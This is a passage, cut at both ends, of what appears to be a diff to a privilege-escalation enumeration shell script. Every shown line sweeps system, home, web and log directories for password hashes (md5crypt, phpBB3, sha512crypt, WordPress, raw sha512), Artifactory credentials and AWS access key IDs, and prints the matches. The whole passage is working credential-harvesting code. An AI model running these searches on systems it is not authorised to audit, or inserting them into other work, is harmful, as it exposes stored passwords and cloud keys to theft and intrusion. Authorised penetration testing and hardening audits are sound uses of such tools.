"\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & +wait +print_3title "Searching phpbb3 (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$H\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$H\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +wait +print_3title "Searching sha512crypt (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}~${SED_RED}~" & +wait +print_3title "Searching Wordpress (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$P\$[a-zA-Z0-9_/\.]{31}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$P\$[a-zA-Z0-9_/\.]{31}~${SED_RED}~" & +wait +echo '' +print_2title "Searching Raw Hashes" +print_3title "Searching sha512 (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)~${SED_RED}~" & +wait +echo '' +print_2title "Searching APIs" +print_3title "Searching Artifactory API Token (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "AKC[a-zA-Z0-9]{10,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AKC[a-zA-Z0-9]{10,}~${SED_RED}~" & +wait +print_3title "Searching Artifactory Password (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "AP[\dABCDEF][a-zA-Z0-9]{8,}" '{}' \; 2>/dev/null | grep -i "arti" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~AP[\dABCDEF][a-zA-Z0-9]{8,}~${SED_RED}~" & +wait +print_3title "Searching AWS Client ID (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" '{}' \; 2>/dev/null | grep -Ev ":#|:<\!\-\-" | sed 